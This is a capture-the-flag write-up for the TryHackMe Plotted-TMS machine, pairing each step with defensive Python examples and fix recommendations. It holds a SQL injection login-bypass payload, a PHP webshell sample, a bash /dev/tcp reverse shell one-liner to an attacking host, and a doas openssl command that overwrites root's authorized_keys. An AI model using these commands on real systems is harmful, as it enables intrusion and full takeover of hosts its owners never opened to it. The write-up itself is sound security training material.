---
title: "Writeup - Plotted-TMS (THM)"
date: 2022-03-31
slug: "writeup-plotted-tms-thm"
type: "writeup-ctf"
---

This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site.
## Enumeration

First, let's start with a service and version scan of the target (`-sV` grabs service banners, `-Pn` skips host discovery so the scan runs even if the target does not answer ping):

```bash
nmap -sV -T4 -Pn 10.10.173.55
```

Three TCP ports are discovered:

![Image](./images/plotted-tms-1.png)

- 22/tcp : SSH (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)
- 445/tcp : a second HTTP web server (Apache 2.4.41). Port 445 is normally SMB; `-sV` identifies the service from its banner rather than from the port number, which is how this second site gets spotted.

## Exploit

I start by enumerating the directories of the site hosted on port 445:

![Image](./images/plotted-tms-2.png)

We find a `management` directory that leads to an admin login page.

![Image](./images/plotted-tms-3.png)

After a few injection tests I finally manage to log in with the following value in the username field. The quote closes the string, `or 1=1` makes the `WHERE` clause true for every row, and `-- -` comments out the rest of the query (the space after `--` matters in MySQL, which only treats `--` as a comment when it is followed by whitespace):

```sql
' or 1=1;-- -
```

I now have access to the admin panel of the site.
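
To show why that username works, here is an added example (my own code, not the room's application or the original post) that runs the same login logic in Python against an in-memory SQLite database. The `users` table, the `admin` row and its password are constructed for the demo; `vulnerable_login` builds the SQL by string concatenation the way a vulnerable handler does, and `safe_login` is the parameterised version that the Recommendations section refers to. Column names and the password are assumptions, not the room's real schema.

```python
import sqlite3
from typing import Optional

# The value typed into the Username field in the writeup.
BYPASS_USERNAME = "' or 1=1;-- -"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account in an in-memory SQLite DB.
    Plaintext passwords are used only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def vulnerable_query(username: str, password: str) -> str:
    """Builds the query the way a vulnerable login handler does: user input glued into SQL."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Returns the logged-in username, or None. The attacker's input is parsed as SQL,
    so the WHERE clause becomes always-true and the first row (admin) is returned."""
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same check with placeholders: the driver passes the values separately from the SQL,
    so quotes and comment markers in the input are just characters inside a string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(BYPASS_USERNAME, "wrong"))
    print("vulnerable:", vulnerable_login(db, BYPASS_USERNAME, "wrong"))  # admin
    print("safe:", safe_login(db, BYPASS_USERNAME, "wrong"))              # None
```

Printing `vulnerable_query(...)` shows the statement the database actually receives: everything after the injected `;` is a comment, so the password check never runs.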

![Image](./images/plotted-tms-4.png)

In this panel I find the `Settings` page, which allows changing the image displayed on the site's home page. Nothing stops me from uploading a file that is not an image, so I send a PHP reverse shell instead.

![Image](./images/plotted-tms-5.png)

The file lands in the uploads directory under the web root, where Apache executes it as PHP. I trigger it by browsing to the following address and opening the uploaded file:

```
http://10.10.173.55:445/management/uploads/
```

I now have a reverse shell with the user `www-data`.
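
The upload above succeeds because the settings page accepts whatever file it is given and stores it under the web root, where the server runs it. As an added example (my code, not the application's), here is the kind of check the upload handler should have applied: the file type is decided from the content's magic bytes rather than from the extension or the client-supplied name, the stored name is generated by the server, and anything that is not a PNG, JPEG or GIF is refused. The sample payloads at the bottom are constructed for the demo, not files from the room.

```python
import secrets
from typing import Optional, Tuple

# Magic bytes of the image formats the settings page should accept.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024
# Defence in depth only: the real protection is never executing files from the upload directory.
CODE_MARKERS = (b"<?php", b"<?=", b"<script")


def sniff_image_type(data: bytes) -> Optional[str]:
    """Decide the file type from content, ignoring the name the client supplied."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(client_filename: str, data: bytes) -> Tuple[Optional[str], str]:
    """Return (server_generated_name, 'ok') or (None, reason).
    client_filename is kept only for logging; it never influences the stored name."""
    if len(data) > MAX_UPLOAD_BYTES:
        return None, "too large"
    ext = sniff_image_type(data)
    if ext is None:
        return None, "content is not a PNG, JPEG or GIF"
    if any(marker in data.lower() for marker in CODE_MARKERS):
        # An image with PHP appended is still dangerous if it can ever be included or executed.
        return None, "image contains embedded code"
    return f"{secrets.token_hex(16)}.{ext}", "ok"


# Constructed test inputs (not real files from the room).
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + bytes(24)
POLYGLOT_PNG = b"\x89PNG\r\n\x1a\n" + bytes(8) + b"<?php phpinfo(); ?>"

if __name__ == "__main__":
    for name, blob in [("shell.php", PHP_SHELL), ("shell.php.png", REAL_PNG), ("cover.png", POLYGLOT_PNG)]:
        print(name, "->", validate_upload(name, blob))
```

Even with this check, the upload directory should not be executable by the web server: with mod_php that means `php_admin_flag engine off` for that directory in the Apache configuration, or better, storing uploads outside the web root and serving them through a handler that sets the content type itself.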

![Image](./images/plotted-tms-6.png)

After some searching I find that the first flag is in the home directory of the user `plot_admin`, but `www-data` has no permission to read it, so I need to find a way to switch to that user.

![Image](./images/plotted-tms-7.png)

After running [linPEAS](https://linpeas.sh) on the machine I find a cron job that runs the script `/var/www/scripts/backup.sh` every minute as the user `plot_admin`.

![Image](./images/plotted-tms-8.png)

I do not have permission to modify the script itself, but I do have write permission on the `/var/www/scripts` directory. Write permission on a directory is enough to rename or remove the entries in it, whatever the permissions on the files themselves, so I can move the original `backup.sh` aside and drop in a replacement that gives me a reverse shell as `plot_admin` the next time cron runs it.

To do this I use the following commands from the `www-data` shell, with a listener (for example `nc -lvnp 2345`) already waiting on the attacking host 10.8.3.186:

```bash
cd /var/www/scripts
# move the original aside: directory write permission allows the rename even though the file is not ours
mv backup.sh tmp
# create the new backup.sh: a reverse shell to the attacking host, run by cron as plot_admin within a minute
touch backup.sh
echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh
chmod +x backup.sh
```
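
Why the replacement works even though `backup.sh` itself is not writable: unlinking or renaming a directory entry only needs write and search permission on the directory, so the file's own mode is irrelevant. The following added example (my code, not from the original post or from linPEAS) turns that reasoning into a check for a cron script and exercises it in a temporary directory that mimics `/var/www/scripts`: first with the directory world-writable, as on this host, then locked down to its owner. The uid 65534 is a stand-in for `www-data`, the script contents are a placeholder, and the check only looks at classic mode bits, so ACLs and MAC policies such as AppArmor are not considered.

```python
import os
import stat
import tempfile
from typing import Dict, Set


def _has_bit(st: os.stat_result, uid: int, gids: Set[int],
             user_bit: int, group_bit: int, other_bit: int) -> bool:
    """Classic Unix permission check for a principal (uid, gids) against one stat result."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & user_bit)
    if st.st_gid in gids:
        return bool(st.st_mode & group_bit)
    return bool(st.st_mode & other_bit)


def cron_script_exposure(script: str, uid: int, gids: Set[int]) -> Dict[str, bool]:
    """Can the principal change what the cron job executes, either by editing the
    script or by renaming/removing it and putting a new file in its place?"""
    st_file = os.lstat(script)
    st_dir = os.stat(os.path.dirname(script) or ".")
    file_writable = _has_bit(st_file, uid, gids, stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)
    # Renaming or unlinking an entry needs write AND search permission on the directory.
    dir_writable = (_has_bit(st_dir, uid, gids, stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)
                    and _has_bit(st_dir, uid, gids, stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH))
    # With the sticky bit set (as on /tmp), only the file's or directory's owner may unlink it.
    sticky = bool(st_dir.st_mode & stat.S_ISVTX)
    can_replace = dir_writable and (not sticky or uid in (0, st_file.st_uid, st_dir.st_uid))
    return {
        "file_writable": file_writable,
        "dir_writable": dir_writable,
        "can_replace": can_replace,
        "hijackable": file_writable or can_replace,
    }


def demo(attacker_uid: int = 65534) -> Dict[str, bool]:
    """Recreate the two states of /var/www/scripts in a temp dir owned by the current user
    and return the 'hijackable' verdict for a different, unprivileged uid in each state."""
    if attacker_uid == os.getuid():
        attacker_uid += 1  # the stand-in must not be the user who owns the temp dir
    with tempfile.TemporaryDirectory() as root:
        scripts = os.path.join(root, "scripts")
        os.mkdir(scripts)
        script = os.path.join(scripts, "backup.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\n# placeholder for the real backup.sh\n")
        os.chmod(script, 0o755)   # rwxr-xr-x: the attacker cannot edit the script itself...
        os.chmod(scripts, 0o777)  # ...but the directory is world-writable, as on the box
        before = cron_script_exposure(script, attacker_uid, {attacker_uid})["hijackable"]
        os.chmod(scripts, 0o750)  # recommended fix: writable by the owner only
        after = cron_script_exposure(script, attacker_uid, {attacker_uid})["hijackable"]
    return {"world_writable_dir": before, "owner_only_dir": after}


if __name__ == "__main__":
    print(demo())  # {'world_writable_dir': True, 'owner_only_dir': False}
```

Pointing `cron_script_exposure` at the real paths from a cron table (with the uid and groups of the web server account) is a quick way to audit a host for the same weakness.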

![Image](./images/plotted-tms-9.png)

I now have a reverse shell as the user `plot_admin` and can read the first flag.

## Privilege escalation

I start by listing the SUID binaries with the following command:

```bash
find / -perm -u=s -type f 2>/dev/null
```

Among them is an uncommon one: [doas](https://man.openbsd.org/doas), an alternative to `sudo` that comes from OpenBSD. After some research I find on this [page](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that its configuration file is `/etc/doas.conf`.

![Image](./images/plotted-tms-10.png)

The configuration shows that my user can run the `openssl` command as root through `doas`. So I look on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for ways to abuse this binary.

GTFOBins lists a file-write primitive: `openssl enc` with no cipher simply copies its input (stdin by default) to the `-out` file, and through `doas` that write is performed as root. So I can write my own SSH public key into root's `authorized_keys` file and then log in over SSH as root.

To do this I use the following commands (`[key]` stands for the public key of a key pair generated on the attacking host):

```bash
FILE=/root/.ssh/authorized_keys
# enc with no cipher copies stdin to the -out file unchanged; doas makes the write happen as root.
# Note that -out truncates the target, so any keys already in the file are replaced.
echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"
```

![Image](./images/plotted-tms-11.png)

I now have a `root` shell and can retrieve the last flag.

## Recommendations

To fix this host, several changes are needed:

- Fix the site's code to prevent SQL injection, using parameterised queries instead of string concatenation ([OWASP SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html))
- Validate the images uploaded from the admin panel (determine the file type from its content, not its extension, and store uploads under a server-generated name), and make sure nothing in the upload directory can be executed by the web server
- Store cron scripts in a directory writable only by their owner, so that a lower-privileged account cannot rename or replace them
- Do not grant root rights through `doas` (or `sudo`) on commands such as `openssl` that can read or write arbitrary files